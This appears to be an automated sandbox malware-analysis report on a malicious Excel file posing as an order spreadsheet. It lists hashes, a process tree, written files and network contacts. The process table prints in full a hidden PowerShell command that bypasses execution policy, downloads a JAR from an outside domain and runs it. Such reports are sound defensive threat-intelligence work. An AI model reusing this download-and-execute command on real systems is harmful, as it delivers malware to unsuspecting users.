File name: | 06.12.2018 Siparis_77.xls |
Full analysis: | https://app.any.run/tasks/ad91d6d0-9314-4c46-9d50-5ca43e2cf7ee |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 10:18:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | Non-ISO extended-ASCII text, with CRLF line terminators |
MD5: | 6EB3F3E5281EB2652EC220AA1F927248 |
SHA1: | 7A0A83CA7B5D9C3F79776AD4ADA0CA18A349BA35 |
SHA256: | BC46802B3F48100DCF0B313BED7967E6E21138686E0612828EAF6C0C6F0B6973 |
SSDEEP: | 192:y8kNFeqyVk3t91/99zWl+FMbjhLNgvw48cob7GX:y8WvrtV9yl1bjZN74Dob7U |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3484 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3940 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://inssanayi.mobi\" ,\" %temp%\\RSfqkJ.jar\") }" & %temp%\\RSfqkJ.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2412 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://inssanayi.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\RSfqkJ.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3352 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\RSfqkJ.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 1 Version: 8.0.920.14 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3484 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA77E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VBGFZ7KFDB2YEXXVU1PS.temp | — | |
MD5:— | SHA256:— | |||
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ceec.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2412 | powershell.exe | C:\Users\admin\AppData\Local\Temp\RSfqkJ.jar | text | |
MD5:13325E5793A9E1CDFD7374D1B2B6B535 | SHA256:AF42F553D04333B4ECCA0182DAEB242229668696EA0211F8C4D88F6608A1760F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2412 | powershell.exe | GET | 200 | 188.165.3.209:80 | http://inssanayi.mobi/ | IE | text | 92 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2412 | powershell.exe | 188.165.3.209:80 | inssanayi.mobi | OVH SAS | IE | unknown |
Domain | IP | Reputation |
---|---|---|
inssanayi.mobi |
| unknown |